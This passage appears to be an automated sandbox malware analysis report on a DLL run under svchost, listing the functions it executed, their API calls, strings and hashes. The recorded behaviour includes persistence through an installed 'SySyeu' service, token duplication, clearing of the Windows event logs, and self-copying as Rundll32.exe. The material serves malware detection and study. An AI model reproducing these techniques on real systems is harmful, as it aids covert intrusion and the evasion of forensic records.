1926->1928 1927->1928 1929 10002aa9 1928->1929 1930 10002a97 1928->1930 1970 100027bc memset strrchr 1929->1970 1930->1923 1932 1000273d 4 API calls 1930->1932 1932->1923 1989 1000473f LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 1933->1989 1936 10002bbf 1936->1899 1937 10001863 16 API calls 1938 10002bba 1937->1938 1938->1899 1940 10002b74 1939->1940 1941 10002b8b 1939->1941 1996 10002ac4 IsWindowVisible 1939->1996 1942 10001863 16 API calls 1940->1942 1941->1899 1943 10002b86 1942->1943 1943->1899 1945 10002622 memcpy LocalSize 1944->1945 1946 1000265c 1944->1946 1947 10001863 16 API calls 1945->1947 1946->1899 1948 1000264d Sleep LocalFree 1947->1948 1948->1946 1949->1899 1951 1000258c 1950->1951 1952 1000259f 1950->1952 1953 10003cd2 _stricmp 1951->1953 1952->1899 1954 10002597 1953->1954 1954->1899 1958 10002680 1955->1958 1956 100026b4 OpenEventLogA 1957 100026c4 ClearEventLogA CloseEventLog 1956->1957 1956->1958 1957->1958 1958->1956 1959 100026da 1958->1959 1959->1899 1960->1899 1963 100046c3 1961->1963 1962 100025b0 ExitWindowsEx 1962->1904 1963->1962 1964 100046fc LoadLibraryA GetProcAddress 1963->1964 1965 1000470d CloseHandle 1964->1965 1967 10004728 FreeLibrary 1965->1967 1968 1000472b 1965->1968 1967->1968 1968->1962 1969 10004731 FreeLibrary 1968->1969 1969->1962 1971 100027f6 strrchr 1970->1971 1972 100028f3 1970->1972 1973 10002846 strcpy 1971->1973 1974 1000281d strlen 1971->1974 1972->1923 1975 10002857 1973->1975 1976 10002827 1974->1976 1977 10004822 13 API calls 1975->1977 1976->1975 1979 10002832 strncpy 1976->1979 1978 10002875 1977->1978 1978->1972 1980 1000287c memset wsprintfA memset 1978->1980 1979->1975 1981 10004822 13 API calls 1980->1981 1982 100028ec 1981->1982 1982->1972 1983 100028fa ExpandEnvironmentStringsA strstr 1982->1983 1984 10002929 strstr 1983->1984 1985 1000295f lstrcpyA 1983->1985 1984->1985 1986 1000293d lstrcatA lstrcatA 1984->1986 1987 10002969 CreateProcessA 1985->1987 1986->1987 1987->1972 1995 10004788 1989->1995 1990 100047cf CloseHandle 1991 10002ba3 1990->1991 1992 100047da FreeLibrary 1990->1992 1991->1936 1991->1937 1992->1991 1993 100047a7 lstrcmpiA 1994 100047c8 1993->1994 1993->1995 1994->1990 1995->1990 1995->1993 1997 10002b43 1996->1997 1998 10002ada SendMessageA lstrlenA 1996->1998 1998->1997 1999 10002b1d _strupr _strupr strstr 1998->1999 1999->1997

                                                                                                                Executed Functions

                                                                                                                Function 10003E6B Relevance: 248.8, APIs: 71, Strings: 71, Instructions: 296libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,1000383C,10004E5A,?,?,?,?,?,?), ref: 10003E85
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 10003E96
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetModuleFileNameA), ref: 10003EA3
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CreateMutexA), ref: 10003EB0
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,ReleaseMutex), ref: 10003EBD
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetLastError), ref: 10003ECA
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CloseHandle), ref: 10003ED7
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,Sleep), ref: 10003EE4
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,lstrcatA), ref: 10003EF1
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetTickCount), ref: 10003EFE
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,WaitForSingleObject), ref: 10003F0B
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetFileAttributesA), ref: 10003F18
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CreateEventA), ref: 10003F25
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,ResetEvent), ref: 10003F32
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,CancelIo), ref: 10003F3F
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,SetEvent), ref: 10003F4C
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,TerminateThread), ref: 10003F59
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetVersionExA), ref: 10003F66
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetExitCodeProcess), ref: 10003F73
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,ExpandEnvironmentStringsA), ref: 10003F80
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetSystemInfo), ref: 10003F8D
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,GetSystemDirectoryA), ref: 10003F9A
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,MoveFileA), ref: 10003FA7
                                                                                                                • GetProcAddress.KERNEL32(74DD0000,MoveFileExA), ref: 10003FB4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                • API String ID: 2238633743-2593546367
                                                                                                                • Opcode ID: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                                                • Instruction ID: 1d4e4a84f7054c9bea1b663399dca5a43fab5260fb22e9cb011038ddc9d5f956
                                                                                                                • Opcode Fuzzy Hash: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                                                • Instruction Fuzzy Hash: F5B16970800B45AEE731AF32CD04EA7BEF6FF84340B118D2DE5AA56924DB32A855DF51
                                                                                                                Function 10001FBD Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 98libraryprocessloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNELBASE(userenv.dll,00000000,00000104,00000000), ref: 10001FCB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10001FDA
                                                                                                                • memset.MSVCRT ref: 10001FF9
                                                                                                                • memset.MSVCRT ref: 10002005
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 10002023
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,000F01FF,10003544), ref: 10002033
                                                                                                                • DuplicateTokenEx.ADVAPI32(10003544,02000000,00000000,00000001,00000001,?), ref: 1000204A
                                                                                                                • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10002069
                                                                                                                • CreateProcessAsUserA.KERNELBASE(?,00000000,10003544,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 10002094
                                                                                                                • CloseHandle.KERNEL32(?), ref: 100020A0
                                                                                                                • CloseHandle.KERNEL32(10003544), ref: 100020A9
                                                                                                                • FreeLibrary.KERNELBASE(?), ref: 100020BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$CloseHandleLibrarymemset$AddressCreateCurrentDuplicateFreeInformationLoadOpenProcUser
                                                                                                                • String ID: CreateEnvironmentBlock$WinSta0\Default$userenv.dll
                                                                                                                • API String ID: 389336417-1779146383
                                                                                                                • Opcode ID: b17ba00ba64db28f18bd6f450c5a4aff0af55f28d04f5de357443b33628a04c7
                                                                                                                • Instruction ID: 393253a686a726e0e40b90c7e54b6c9b8ea898aa750e1207ba5c491074f34e4f
                                                                                                                • Opcode Fuzzy Hash: b17ba00ba64db28f18bd6f450c5a4aff0af55f28d04f5de357443b33628a04c7
                                                                                                                • Instruction Fuzzy Hash: E13104B2D11229BBEB11DFD5CD89DDEBFBAEF08781F200056F605A2154C7B15A00DBA0
                                                                                                                Function 1000336E Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 150stringsleepregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • strncpy.MSVCRT ref: 1000338C
                                                                                                                • wcstombs.MSVCRT ref: 1000339C
                                                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(?,100032F7), ref: 100033B1
                                                                                                                • FreeConsole.KERNEL32 ref: 100033C6
                                                                                                                  • Part of subcall function 1000318A: SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                                                • GetVersionExA.KERNEL32(?), ref: 100033F3
                                                                                                                • MainThread.6011859 ref: 1000340F
                                                                                                                  • Part of subcall function 1000315D: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003178
                                                                                                                  • Part of subcall function 1000315D: CloseHandle.KERNEL32(00000000), ref: 1000317F
                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10003426
                                                                                                                • lstrcatA.KERNEL32(?,1000660C), ref: 10003438
                                                                                                                • lstrcatA.KERNEL32(?,SySyeu), ref: 1000344A
                                                                                                                • lstrcatA.KERNEL32(?,.exe), ref: 1000345C
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000346A
                                                                                                                • lstrcatA.KERNEL32(?,\Rundll32.exe), ref: 1000347C
                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 10003492
                                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 1000349F
                                                                                                                • GetLastError.KERNEL32 ref: 100034AA
                                                                                                                • wsprintfA.USER32 ref: 100034C3
                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100034DE
                                                                                                                • wsprintfA.USER32 ref: 100034FE
                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 1000350C
                                                                                                                • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 10003517
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 10003527
                                                                                                                • Sleep.KERNELBASE(00000BB8), ref: 10003532
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003559
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003560
                                                                                                                • Sleep.KERNEL32(00000064), ref: 10003568
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$CloseFileHandleSleep$DirectoryObjectServiceSingleWaitwsprintf$AttributesCodeConsoleCopyCtrlCurrentErrorExitFreeHandlerLastMainModuleNameProcessRegisterStatusSystemThreadVersionstrncpywcstombs
                                                                                                                • String ID: %s "%s",MainThread$.exe$SySyeu$\Rundll32.exe
                                                                                                                • API String ID: 2268562214-1198991748
                                                                                                                • Opcode ID: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                                                • Instruction ID: 41d25408302aabc459f6968b7f59f59ff79b25a4c4978eb5c8748b31ff7b5c46
                                                                                                                • Opcode Fuzzy Hash: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                                                • Instruction Fuzzy Hash: 06515275800269AFEB11DBA0CCC99DF77BEEB09395F604465F209D2058DB719A84CF61
                                                                                                                Function 1000318A Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 34 1000318a-100031d1 SetServiceStatus
                                                                                                                APIs
                                                                                                                • SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ServiceStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 3969395364-0
                                                                                                                • Opcode ID: 27465d0ccf9c2ca7f2eb77ed8655f8ffd3fcd3240fb6f93fded1e015b92d134b
                                                                                                                • Instruction ID: 42df913d68a79b1f62ab0f840a1365e4bfcb694bfd220718bb7b564d1378dfbb
                                                                                                                • Opcode Fuzzy Hash: 27465d0ccf9c2ca7f2eb77ed8655f8ffd3fcd3240fb6f93fded1e015b92d134b
                                                                                                                • Instruction Fuzzy Hash: 24F0A5B0D0021EDFDB40DF99D8857AEBBF4BB08348F108069E818A7244D7B496048F90

                                                                                                                Non-executed Functions

                                                                                                                Function 10001B5B Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 176serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                                                • _local_unwind2.MSVCRT ref: 10001BA9
                                                                                                                • CreateServiceA.ADVAPI32(00000000,00000000,00000000,000F01FF,?,10001E9B,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 10001BE6
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 10001BF5
                                                                                                                • OpenServiceA.ADVAPI32(10001E9B,00000000,000F01FF,?,00000000), ref: 10001C09
                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000000), ref: 10001C1F
                                                                                                                • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?,?,00000000), ref: 10001C43
                                                                                                                • ChangeServiceConfig2A.ADVAPI32(00000000,00000002,?), ref: 10001CA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$ChangeConfig2Open$CreateErrorLastManagerStart_local_unwind2
                                                                                                                • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
                                                                                                                • API String ID: 1109860625-2908613140
                                                                                                                • Opcode ID: ae27365f3abc695d381728d134456e741ffe8850672492339ff11c7de2e79d22
                                                                                                                • Instruction ID: 34160cdb049149ef51204cb724d21122ba78e6005a4a2cbc3d1f025aef1d8869
                                                                                                                • Opcode Fuzzy Hash: ae27365f3abc695d381728d134456e741ffe8850672492339ff11c7de2e79d22
                                                                                                                • Instruction Fuzzy Hash: E6813270C086A8DEEB21CB64CC88BDEBFB5AB19344F0401D9E55C66291C77A0F94CF65
                                                                                                                Function 10001A43 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 53servicesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,SySyeu,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A54
                                                                                                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A69
                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A7A
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A84
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A92
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001AA0
                                                                                                                • Sleep.KERNEL32(00000064), ref: 10001AB2
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001ABB
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001AC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$Open$ErrorLastManagerQuerySleepStartStatus
                                                                                                                • String ID: SySyeu
                                                                                                                • API String ID: 191932718-1969729670
                                                                                                                • Opcode ID: 014086cccfa01bbc5a08c9c9583791d5995df2f921ac7ee13cb4fdb749c4e3c5
                                                                                                                • Instruction ID: 9ee7ec8bb55b1ac22ac6ce330aaae550d3e81ab1b6a3f2d0b0f6497ceb73b83b
                                                                                                                • Opcode Fuzzy Hash: 014086cccfa01bbc5a08c9c9583791d5995df2f921ac7ee13cb4fdb749c4e3c5
                                                                                                                • Instruction Fuzzy Hash: 33012531746327EBF711ABA05CC9FEF36A9EB0A7C1F200420F602D9099DB65884186E6
                                                                                                                Function 10002BC3 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77stringprocessCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 10002BD1
                                                                                                                • memset.MSVCRT ref: 10002BEF
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • lstrlenA.KERNEL32(?), ref: 10002C1E
                                                                                                                • strstr.MSVCRT ref: 10002C34
                                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 10002C44
                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002C8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
                                                                                                                • String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
                                                                                                                • API String ID: 2952214944-490771695
                                                                                                                • Opcode ID: 7fd2577a0a9b6326ac895a1fa05e515703ef0ef4a7097cdaa6f8a03547f7ada4
                                                                                                                • Instruction ID: 41262b3153465784fb7137690828f40fbae5b7cfa485d5802afb8d228550aeb8
                                                                                                                • Opcode Fuzzy Hash: 7fd2577a0a9b6326ac895a1fa05e515703ef0ef4a7097cdaa6f8a03547f7ada4
                                                                                                                • Instruction Fuzzy Hash: 46216A72900128AAFF60CBE1CD48EDF7BBCEF453D2F100015BA09E6048DA719A84CBA0
                                                                                                                Function 1000265E Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenEventLogA.ADVAPI32(00000000,Application), ref: 100026B8
                                                                                                                • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 100026C7
                                                                                                                • CloseEventLog.ADVAPI32(00000000), ref: 100026CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Event$ClearCloseOpen
                                                                                                                • String ID: (b$Application$Security$System
                                                                                                                • API String ID: 1391105993-346596376
                                                                                                                • Opcode ID: 979e5dc6c9d061fd1560a2a7781cfa77c6718ec7c1a2c36edda2fbc21b44326a
                                                                                                                • Instruction ID: bc44e267b22650a43e45f5af2b99767b5e3e23e3035c63c9d4cfe444952d6dd8
                                                                                                                • Opcode Fuzzy Hash: 979e5dc6c9d061fd1560a2a7781cfa77c6718ec7c1a2c36edda2fbc21b44326a
                                                                                                                • Instruction Fuzzy Hash: 5D018F71E00A99BBFB00DF94984479DBFB4EB097C9FA04095E506EB248D73A8E408F95
                                                                                                                Function 10001F48 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47servicestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 10001F4E
                                                                                                                  • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                                                  • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                                                  • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                                                  • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F6B
                                                                                                                • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,10002F76,SySyeu), ref: 10001F7F
                                                                                                                • DeleteService.ADVAPI32(00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F8C
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F93
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,SySyeu), ref: 10001F9A
                                                                                                                Strings
                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001FA7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandleOpen$ManagerQueryStatus$ControlDeleteSleepstrlen
                                                                                                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                                                • API String ID: 625463800-1784019800
                                                                                                                • Opcode ID: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                                                • Instruction ID: 320e00f64ca60edd69a113f9dbbd44adb98dc69d7bce9bbf9f1d19ab5e200103
